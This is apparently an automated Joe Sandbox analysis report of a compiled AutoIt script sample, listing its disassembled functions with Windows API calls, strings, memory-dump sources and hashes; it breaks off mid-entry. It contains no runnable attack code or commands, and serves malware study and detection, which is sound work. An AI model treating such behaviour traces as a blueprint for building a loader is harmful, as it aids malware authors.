API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
Instruction ID: 89162eab67880fdb0adf224d47e762a37e89c00e0948072590d2b4969f634bec
Opcode Fuzzy Hash: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
Instruction Fuzzy Hash: 4751F770908248BECF11EBB4DC059FEBBB9AF49314F04D069F459F62A2DA709605EB21

Function 00E74FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E74FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E75010
LoadResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD60
SizeofResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD75
LockResource.KERNEL32(N,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F,00000000), ref: 00EADD88

Strings

SCRIPT, xrefs: 00E75006
N, xrefs: 00EADD85

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT$N
API String ID: 3051347437-3852340653
Opcode ID: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
Instruction ID: 87944d9b6fdc1e4cd7b27243a14ce688262cbb3c2d3dd8cdceb09bdbaa860c24
Opcode Fuzzy Hash: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
Instruction Fuzzy Hash: 20115E75200700AFE7218B66DC58F677BB9EFC9B51F108568F40AA6260DBA1E804C660

Function 00E74AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E74B2B

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

GetCurrentProcess.KERNEL32(?,00EFFAEC,00000000,00000000,?), ref: 00E74BF8
IsWow64Process.KERNEL32(00000000), ref: 00E74BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E74C45
FreeLibrary.KERNEL32(00000000), ref: 00E74C50
GetSystemInfo.KERNEL32(00000000), ref: 00E74C81
GetSystemInfo.KERNEL32(00000000), ref: 00E74C8D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
Instruction ID: 6075e8bda6a9558f34c3cf92215762ff3a2642fc31fd78938656d15bd4ffff77
Opcode Fuzzy Hash: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
Instruction Fuzzy Hash: 5F91C57154E7C4DEC732CB6884511AAFFE4AF6A304B44999ED0CFA7A41D320F948D729

Function 00ED4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00EAE7C1), ref: 00ED46A6
FindFirstFileW.KERNELBASE(?,?), ref: 00ED46B7
FindClose.KERNEL32(00000000), ref: 00ED46C7

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
Instruction ID: ab3bcafd5a85c593a426c5c445e47f44fef6bcb6778d724cb23b73955f25bd4e
Opcode Fuzzy Hash: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
Instruction Fuzzy Hash: 86E0D8714104005F52106738EC4D8FA775CDF96335F100716F936E12F0E7B09954C595

Function 00E7E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00EB428C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 9d1a19da7d127a79a20dae3860019f15d20be263baf43fd5f0bb109ca15c4950
Instruction ID: c9f890ce1824f14ccf59f09e9f8be581d5d99f293e9f36affa78a491f34081aa
Opcode Fuzzy Hash: 9d1a19da7d127a79a20dae3860019f15d20be263baf43fd5f0bb109ca15c4950
Instruction Fuzzy Hash: B7A26B75A04205CFCB24CF58C481AAEB7B2FF58314F2495A9E91ABB352D731ED42CB91

Function 00E80B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80BBB
timeGetTime.WINMM ref: 00E80E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80FB3
TranslateMessage.USER32(?), ref: 00E80FC7
DispatchMessageW.USER32(?), ref: 00E80FD5
Sleep.KERNEL32(0000000A), ref: 00E80FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00E8105A
DestroyWindow.USER32 ref: 00E81066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E81080
Sleep.KERNEL32(0000000A,?,?), ref: 00EB52AD
TranslateMessage.USER32(?), ref: 00EB608A
DispatchMessageW.USER32(?), ref: 00EB6098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EB60AC

Strings

@GUI_CTRLHANDLE, xrefs: 00EB540E
@COM_EVENTOBJ, xrefs: 00EB591A
@GUI_WINHANDLE, xrefs: 00EB53B9
@GUI_CTRLID, xrefs: 00EB5364
@TRAY_ID, xrefs: 00EB5BB9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 27ec84fa0d3c93ec693800e5d9928c3c50a0bcf1e902f1527d16f58d4ba29351
Instruction ID: 3fee2f9fe86898ecad0a189ec015de27ed6f054d24cc2ef337d6ea1afe1fedc6
Opcode Fuzzy Hash: 27ec84fa0d3c93ec693800e5d9928c3c50a0bcf1e902f1527d16f58d4ba29351
Instruction Fuzzy Hash: 3DB2D371608741DFD728DF24C884BABB7E5BF84308F14991DE49DA72A1DB71E849CB82

Function 00ED93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED91E9: __time64.LIBCMT ref: 00ED91F3

Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D

__wsplitpath.LIBCMT ref: 00ED94BE

Part of subcall function 00E9432E: __wsplitpath_helper.LIBCMT ref: 00E9436E

_wcscpy.LIBCMT ref: 00ED94D1
_wcscat.LIBCMT ref: 00ED94E4
__wsplitpath.LIBCMT ref: 00ED9509
_wcscat.LIBCMT ref: 00ED951F
_wcscat.LIBCMT ref: 00ED9532

Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9268
Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9277

_wcscmp.LIBCMT ref: 00ED9479

Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED96DC
_wcsncpy.LIBCMT ref: 00ED974F
DeleteFileW.KERNEL32(?,?), ref: 00ED9785
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97BE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: db3c3cecd310d18abec2d8344f9c653e0214d27a3b902a2561e0a5bf62d246db
Instruction ID: 7699e4e3aca10e86f840169b7945bb7079b7f4850cebe2bc187841a886f139be
Opcode Fuzzy Hash: db3c3cecd310d18abec2d8344f9c653e0214d27a3b902a2561e0a5bf62d246db
Instruction Fuzzy Hash: 2BC13AB1A00219AEDF21DFA5CC85ADEB7BDEF44304F0050ABF609F6252DB709A458F65

Function 00E7301E Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E73074
RegisterClassExW.USER32(00000030), ref: 00E7309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
LoadIconW.USER32(000000A9), ref: 00E730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101

Strings

TaskbarCreated, xrefs: 00E730A4
0, xrefs: 00E73056
+, xrefs: 00E7305D
AutoIt v3 GUI, xrefs: 00E73090

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
Instruction ID: 7fb288f5673b7d38bdd978c0be6f1779cb9e3cc7cf13fd13588e0ba9ffee0366
Opcode Fuzzy Hash: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
Instruction Fuzzy Hash: F93137B1940309AFDB00DFA5EC85AEDBBF1FF09320F10852AE640E62A0D7B54585DF91

Function 00E73041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E73074
RegisterClassExW.USER32(00000030), ref: 00E7309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
LoadIconW.USER32(000000A9), ref: 00E730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101

Strings

TaskbarCreated, xrefs: 00E730A4
0, xrefs: 00E73056
+, xrefs: 00E7305D
AutoIt v3 GUI, xrefs: 00E73090

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
Instruction ID: 6109bfe1cc94c647332b866e1c08e0925d62037d2020fa2316996587a689331f
Opcode Fuzzy Hash: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
Instruction Fuzzy Hash: 3221B4B1910218BFDB00DFA5E889AADBBF5FF08710F00812AFA10E62A0D7B14548DF95

Function 00E771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E74864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F362F8,?,00E737C0,?), ref: 00E74882

Part of subcall function 00E9074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E772C5), ref: 00E90771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E77308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EAECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EAED32
RegCloseKey.ADVAPI32(?), ref: 00EAED70
_wcscat.LIBCMT ref: 00EAEDC9

Strings

\, xrefs: 00EAEDEC
\Include\, xrefs: 00E772C5
Include, xrefs: 00EAECE8, 00EAED29
Software\AutoIt v3\AutoIt, xrefs: 00E772FE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: a2bf4404fe5e6e119b6e4f5fbefc00046e08adc5f21d1247a4e3d911e129b3fc
Instruction ID: 116d14316f78556d88a5766d42b493d2722d3f3a4c7fae5a203dfb13135aa68f
Opcode Fuzzy Hash: a2bf4404fe5e6e119b6e4f5fbefc00046e08adc5f21d1247a4e3d911e129b3fc
Instruction Fuzzy Hash: 48718FB15083059EC724EF65DC818ABB7E9FF89360F40552EF449A72A0DB70D948EF62

Function 00E73A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E73A62
LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
LoadIconW.USER32(00000063), ref: 00E73A88
LoadIconW.USER32(000000A4), ref: 00E73A9A
LoadIconW.USER32(000000A2), ref: 00E73AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
RegisterClassExW.USER32(?), ref: 00E73B28

Part of subcall function 00E73041: GetSysColorBrush.USER32(0000000F), ref: 00E73074
Part of subcall function 00E73041: RegisterClassExW.USER32(00000030), ref: 00E7309E
Part of subcall function 00E73041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
Part of subcall function 00E73041: InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
Part of subcall function 00E73041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
Part of subcall function 00E73041: LoadIconW.USER32(000000A9), ref: 00E730F2
Part of subcall function 00E73041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101

Strings

AutoIt v3, xrefs: 00E73B17
0, xrefs: 00E73B06
#, xrefs: 00E73B0D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
Instruction ID: 32cb0f9fde377914cb5b5f0c7fb0957c59ff6a57db8f4dde2488bd609477a990
Opcode Fuzzy Hash: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
Instruction Fuzzy Hash: AB215C70910308BFEF109FA5EC09B9E7BB6EB48720F00812AE504B62A1C3B69554EF94

Function 00E73633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00E736D2
KillTimer.USER32(?,00000001), ref: 00E736FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E7371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7372A
CreatePopupMenu.USER32 ref: 00E7373E
PostQuitMessage.USER32(00000000), ref: 00E7375F

Strings

TaskbarCreated, xrefs: 00E73725

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
Instruction ID: 1e59d15232e9185409722a91b5207d92acfb8259b748f56f7823da11592a0152
Opcode Fuzzy Hash: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
Instruction Fuzzy Hash: 814127B1204109BBDF54AB74DC49BBA3795EB45310F14A12AF50AF62E2DB60EE04F761

Function 00E73778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteScript, xrefs: 00E738CE
CMDLINERAW, xrefs: 00E7380D
CMDLINE, xrefs: 00E73834
/AutoIt3OutputDebug, xrefs: 00E738A4
/ErrorStdOut, xrefs: 00E7388F
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00E737C0
/AutoIt3ExecuteLine, xrefs: 00E738B9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: f59f40223865481e8e715af45213a4fc79cf905360882d7914cc58d67792b414
Instruction ID: d8331f037464fc50ff4c39766894792de1b1a5f54f7e64b4c0c5b08d9dbd41dc
Opcode Fuzzy Hash: f59f40223865481e8e715af45213a4fc79cf905360882d7914cc58d67792b414
Instruction Fuzzy Hash: 05A1527191021DAADF04EBA0CC95DEEB7B8FF14310F44942AF41AB7192DF749A09DB61

Function 01712690 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01712761
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01712987

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
Instruction ID: d65cc4ba8d4c7e7fbfa7c3193ed7efcc78990d9a0e6f2a5142cd709bb7a03654
Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
Instruction Fuzzy Hash: 0AA10870E00209EBEB14CFA8C894BEEFBB5BF48704F208199E611BB285D7759A41CF54

Function 00E739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
ShowWindow.USER32(00000000,?,?), ref: 00E73A53

Strings

edit, xrefs: 00E73A30
AutoIt v3, xrefs: 00E73A0D, 00E73A12, 00E73A13

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
Instruction ID: 21006b3a961fcc4ca37d08d8feaebfd1399732121fecdd7f09ee4e26f4fd87ef
